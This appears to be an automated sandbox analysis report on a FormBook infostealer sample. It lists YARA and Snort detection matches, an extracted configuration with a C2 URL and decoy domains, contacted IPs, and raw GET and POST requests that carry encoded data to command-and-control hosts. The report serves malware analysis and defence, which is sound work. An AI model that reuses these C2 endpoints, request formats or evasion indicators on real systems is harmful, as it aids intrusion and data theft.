12.0.iuvRyl9i7D.exe.400000.8.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.0.iuvRyl9i7D.exe.400000.8.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
12.2.iuvRyl9i7D.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
12.2.iuvRyl9i7D.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.2.iuvRyl9i7D.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
12.0.iuvRyl9i7D.exe.400000.6.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
12.0.iuvRyl9i7D.exe.400000.6.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.0.iuvRyl9i7D.exe.400000.6.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
12.2.iuvRyl9i7D.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
12.2.iuvRyl9i7D.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
12.2.iuvRyl9i7D.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xd7b20:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd7eba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x102940:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x102cda:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12c760:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12cafa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe525d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11007d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x139e9d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xe4d09:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x10fb29:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139949:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xe535f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x11017f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x139f9f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xe54d7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1102f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13a117:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xd88d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1036f2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12d512:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xe7721:$sqlite3step: 68 34 1C 7B E1 0xe7834:$sqlite3step: 68 34 1C 7B E1 0x112541:$sqlite3step: 68 34 1C 7B E1 0x112654:$sqlite3step: 68 34 1C 7B E1 0x13c361:$sqlite3step: 68 34 1C 7B E1 0x13c474:$sqlite3step: 68 34 1C 7B E1 0xe7750:$sqlite3text: 68 38 2A 90 C5 0xe7875:$sqlite3text: 68 38 2A 90 C5 0x112570:$sqlite3text: 68 38 2A 90 C5 0x112695:$sqlite3text: 68 38 2A 90 C5 0x13c390:$sqlite3text: 68 38 2A 90 C5 0x13c4b5:$sqlite3text: 68 38 2A 90 C5 0xe7763:$sqlite3blob: 68 53 D8 7F 8C 0xe788b:$sqlite3blob: 68 53 D8 7F 8C 0x112583:$sqlite3blob: 68 53 D8 7F 8C 0x1126ab:$sqlite3blob: 68 53 D8 7F 8C 0x13c3a3:$sqlite3blob: 68 53 D8 7F 8C 0x13c4cb:$sqlite3blob: 68 53 D8 7F 8C
0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0x22017a:$v1: SbieDll.dll 0x220194:$v2: USER 0x2201a0:$v3: SANDBOX 0x2201b2:$v4: VIRUS 0x220202:$v4: VIRUS 0x2201c0:$v5: MALWARE 0x2201d2:$v6: SCHMIDTI 0x2201e6:$v7: CURRENTUSER
Click to see the 21 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 35.209.127.155

Timestamp:	192.168.2.435.209.127.15549776802031449 05/14/22-15:30:16.775228
SID:	2031449
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 35.209.127.155

Timestamp:	192.168.2.435.209.127.15549776802031453 05/14/22-15:30:16.775228
SID:	2031453
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 35.209.127.155

Timestamp:	192.168.2.435.209.127.15549776802031412 05/14/22-15:30:16.775228
SID:	2031412
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.admincost.com/n6g4/"], "decoy": ["bw589jumpb.xyz", "lojas-marias.com", "gadgersvip.com", "zeavd.com", "moment4miracles.com", "wildcanetours.com", "executivetravelandlogistics.com", "uspplongee.com", "schilova.online", "smoothie-optics.com", "masterima.net", "kickball.site", "theastralark.com", "nick-sylvestro.com", "properscooter.com", "wave-thermodynamics.com", "bitcollide.com", "xed5555.com", "tsue-sangyo.com", "lucianaejoaoalberto.com", "6084pinelake.info", "plentyhearty.com", "findmylostphone.me", "cliffpassphotographyllc.com", "goddessboi.com", "vulkan-platinum-online.info", "jumpn-giveaway.online", "linymar.xyz", "topgir.site", "oifreunion.com", "lewks.beauty", "servellobody.com", "eagle-five.com", "agelessfish.com", "daulat-kantorbahasamalut.com", "zombarias.com", "chimneyrepairbiloxi.com", "starline-pools.com", "financeenovationinc.com", "sakvoyge.online", "46458.pet", "babyminer.xyz", "alcosto.club", "aeroyogabrasil.com", "cellphstudy.com", "bldh45.xyz", "sguoffcampusrentals.com", "nehalooks.com", "employeebnsf.com", "duniacuan.online", "running-diary.site", "o-taguro.com", "iacli.run", "cariniclinicalconsulting.com", "btcspay.xyz", "funaoka-watanabedent.com", "jamesreadtanusa.com", "dems-clicks.com", "dowsuserc.top", "joseikinmadoguchi.com", "hulizb6.com", "luxurybathshowers.com", "kapamilla.com", "duowb.com"]}

Multi AV Scanner detection for submitted file

Source: iuvRyl9i7D.exe	Virustotal: Detection: 23%			Perma Link
Source: iuvRyl9i7D.exe	ReversingLabs: Detection: 19%

Yara detected FormBook

Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.uspplongee.com/n6g4/	Avira URL Cloud: Label: malware
Source: http://www.properscooter.com/n6g4/	Avira URL Cloud: Label: malware
Source: http://www.kickball.site/n6g4/	Avira URL Cloud: Label: phishing
Source: http://www.kickball.site/n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu	Avira URL Cloud: Label: phishing
Source: http://www.dems-clicks.com/n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe

ReversingLabs: Detection: 19%

Machine Learning detection for sample

Source: iuvRyl9i7D.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe

Joe Sandbox ML: detected

Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: iuvRyl9i7D.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: iuvRyl9i7D.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_00611660 FindFirstFileW,FindNextFileW,FindClose,		21_2_00611660
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_00611659 FindFirstFileW,FindNextFileW,FindClose,		21_2_00611659

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 4x nop then pop edi		12_2_00417317
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi		21_2_00617316

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 38.34.163.59 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.209.127.155 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.properscooter.com
Source: C:\Windows\explorer.exe	Domain query: www.jamesreadtanusa.com
Source: C:\Windows\explorer.exe	Network Connect: 198.54.116.236 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.uspplongee.com
Source: C:\Windows\explorer.exe	Domain query: www.bldh45.xyz
Source: C:\Windows\explorer.exe	Network Connect: 5.183.8.183 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.dems-clicks.com
Source: C:\Windows\explorer.exe	Domain query: www.kickball.site
Source: C:\Windows\explorer.exe	Network Connect: 35.241.47.216 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.216 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 35.209.127.155:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 35.209.127.155:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 35.209.127.155:80

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.bldh45.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.admincost.com/n6g4/

Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox View	ASN Name: INTERXSCH INTERXSCH

Source: global traffic	HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV HTTP/1.1Host: www.dems-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu HTTP/1.1Host: www.kickball.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n6g4/?3fe=er/aW89j3eiO30Tth32zztWhmYSSn5MxbIqpkVj2P1EZBbsuTNG7fFHg+MTirOdy738q&r2MLI=tjrDPFcXi HTTP/1.1Host: www.bldh45.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=DeftxpR1OWSh4aZAk/LljwybnwLEUT8BN/DlQaDlT4i7MS32eqTj8UaDk/+v6eXHg19D HTTP/1.1Host: www.properscooter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n6g4/?3fe=YEAzGNA1BgiQpi8GImtX9JznxcWz/G0oG2K4jwCI3/8B8s5l+/t603YZPdD+BzgPPrJ7&r2MLI=tjrDPFcXi HTTP/1.1Host: www.uspplongee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jamesreadtanusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.jamesreadtanusa.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 63 39 68 48 6f 51 43 67 61 34 4f 30 7a 35 6a 51 43 6a 59 65 32 75 34 6b 41 71 6f 70 66 77 79 34 7e 77 52 67 35 72 35 6c 47 66 36 73 76 36 54 5a 77 5f 54 68 52 30 41 58 6e 58 35 35 42 67 57 6e 73 56 54 49 73 42 6e 57 4f 39 43 4f 34 4b 30 50 48 59 44 61 73 6d 67 57 43 4d 79 48 44 71 67 33 62 6e 6a 56 76 44 44 47 57 64 54 6d 41 4e 52 59 5a 6e 63 7a 34 43 39 38 39 52 54 4c 54 36 6f 55 39 77 48 6a 44 70 59 4f 59 65 75 36 62 67 31 55 79 72 6b 6f 68 70 71 39 59 4c 6d 59 4e 44 69 66 63 44 58 64 6f 4f 4a 33 52 43 4c 64 6f 79 31 4d 78 71 41 2d 73 31 33 43 30 46 71 55 30 6d 78 4b 49 45 78 4f 39 78 58 38 52 6b 78 35 4a 44 72 32 4f 52 6a 56 36 74 63 43 39 4a 6e 4c 44 78 71 66 73 32 75 55 61 6f 61 72 46 59 42 31 46 72 59 50 44 59 42 58 7a 31 69 47 4d 6e 6b 53 49 59 39 37 52 66 61 52 43 42 63 5f 61 74 58 62 72 63 45 74 59 55 6e 4a 42 55 68 35 30 54 6e 66 66 77 44 34 30 6f 41 6c 7e 70 63 7a 41 6b 4d 61 39 66 6e 47 6e 71 7e 6a 42 65 47 53 63 37 45 6b 4d 67 28 75 7e 37 30 62 37 78 48 4d 34 62 79 33 4a 63 68 74 51 48 43 54 56 36 79 75 37 47 62 7a 38 50 70 62 78 6a 56 50 76 56 28 78 36 51 55 46 74 69 70 43 45 44 4b 37 4f 79 6a 78 6f 62 74 52 49 4a 67 48 78 38 6d 64 66 4c 6b 65 43 64 79 73 50 54 38 45 49 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=c9hHoQCga4O0z5jQCjYe2u4kAqopfwy4~wRg5r5lGf6sv6TZw_ThR0AXnX55BgWnsVTIsBnWO9CO4K0PHYDasmgWCMyHDqg3bnjVvDDGWdTmANRYZncz4C989RTLT6oU9wHjDpYOYeu6bg1Uyrkohpq9YLmYNDifcDXdoOJ3RCLdoy1MxqA-s13C0FqU0mxKIExO9xX8Rkx5JDr2ORjV6tcC9JnLDxqfs2uUaoarFYB1FrYPDYBXz1iGMnkSIY97RfaRCBc_atXbrcEtYUnJBUh50TnffwD40oAl~pczAkMa9fnGnq~jBeGSc7EkMg(u~70b7xHM4by3JchtQHCTV6yu7Gbz8PpbxjVPvV(x6QUFtipCEDK7OyjxobtRIJgHx8mdfLkeCdysPT8EIg).
Source: global traffic	HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.jamesreadtanusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.jamesreadtanusa.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 63 39 68 48 6f 53 58 72 56 73 48 69 39 4a 75 32 4d 32 55 77 35 5f 49 63 42 61 38 6d 54 53 32 6a 70 79 6b 54 68 4a 52 79 46 66 43 32 71 4f 7a 67 6a 73 69 6b 52 30 78 44 74 46 64 39 4c 67 61 67 73 56 4b 62 73 46 37 57 50 2d 43 65 35 70 63 6c 57 36 37 62 71 47 67 6d 42 4d 7a 54 48 76 45 4b 62 6e 6e 6a 76 44 62 6f 57 74 76 6d 47 76 70 59 66 67 49 43 32 43 39 2d 77 78 44 58 4d 71 6c 72 39 77 66 37 44 72 4d 4f 59 75 69 36 62 44 74 54 30 73 59 6e 37 4a 71 6b 53 72 6d 42 47 69 65 74 63 44 53 4f 6f 4f 31 33 52 77 76 64 72 43 56 4d 30 64 55 5f 35 56 32 70 77 46 71 64 69 57 39 66 49 45 73 42 39 30 76 4b 53 55 31 35 4b 54 72 7a 4c 47 66 33 77 65 45 56 37 4a 54 6e 44 78 6e 4c 73 45 4c 4a 61 70 33 49 41 64 46 4f 5a 5a 41 78 44 63 6b 79 77 56 69 43 56 58 6c 41 49 59 39 4c 52 66 62 47 43 43 45 5f 61 71 4c 62 71 5f 38 74 65 30 6e 57 49 45 68 37 28 44 6e 2d 62 77 28 61 30 6f 5a 4b 7e 73 41 6a 42 53 45 61 38 4f 33 47 7a 35 6d 69 4a 65 47 63 59 37 45 46 61 67 28 68 7e 37 31 30 37 79 65 4c 34 4d 79 33 62 39 68 74 54 68 57 54 54 4b 79 75 33 6d 62 78 70 5f 6c 4c 78 6a 4e 4c 76 55 4f 4f 37 69 34 46 74 77 68 43 44 69 4b 37 50 69 6a 78 38 72 73 46 49 6f 68 5a 36 66 48 4e 4d 4a 5a 2d 66 62 37 38 4c 6e 68 68 54 30 37 5f 41 66 41 56 32 64 35 31 77 56 55 44 35 6e 63 4a 66 35 66 61 35 65 46 4a 59 4e 4c 4b 74 6c 64 4d 28 72 53 6c 4d 39 75 41 48 55 50 48 70 59 30 4a 32 73 55 76 39 72 42 50 77 39 46 37 32 58 39 7a 55 37 38 59 76 38 4a 44 34 61 6b 45 42 67 6b 54 5a 32 64 55 4b 49 37 49 77 34 61 79 50 79 50 50 68 4e 65 69 52 4b 51 33 61 6f 4e 47 69 37 33 33 58 45 56 30 54 5a 33 4f 54 39 57 37 7a 4a 6e 31 67 77 49 4e 39 4b 41 4a 4a 72 79 46 7e 7a 47 74 4b 6b 76 61 76 54 56 35 75 42 4a 64 43 69 67 4d 77 4d 33 44 7e 57 6c 73 58 52 53 6d 70 6f 44 31 56 34 58 57 4e 71 43 46 34 50 43 59 36 4f 7a 79 42 58 7e 66 49 4d 42 71 7a 71 31 32 52 38 72 43 6d 6a 78 4a 6d 42 46 6d 6e 4c 48 4c 49 79 59 57 48 79 4f 57 59 75 32 31 45 4f 6e 67 33 36 49 4e 72 38 75 49 73 4b 61 52 78 48 51 4b 37 4b 55 73 46 34 54 58 33 4f 38 4d 5a 30 6d 63 75 39 53 67 37 37 37 56 4e 30 36 30 35 54 45 6d 36 54 51 42 64 4f 5a 53 31 63 41 6e 6c 48 38 41 32 4a 44 38 4e 4c 58 4f 75 36 5a 42 52 4b 75 4c 68 35 69 66 43 49 4a 71 68 34 4b 76 66 71 37 4d 42 7a 69 64 4f 48 76 4e 62 65 50 33 35 53 45 55 56 64 46 46 52 5f 77 77 51 71 4d 61 54 72 30 32 52 30 69 45 53 2d 52 64 61 41 48 32 76 72 65 31 44 43 34 71 44 66 6d 67 79 6e 65 5f 58 57 39 51 35 75 56 4b 51 77 41 33 53 35 47 50 44 50 5a 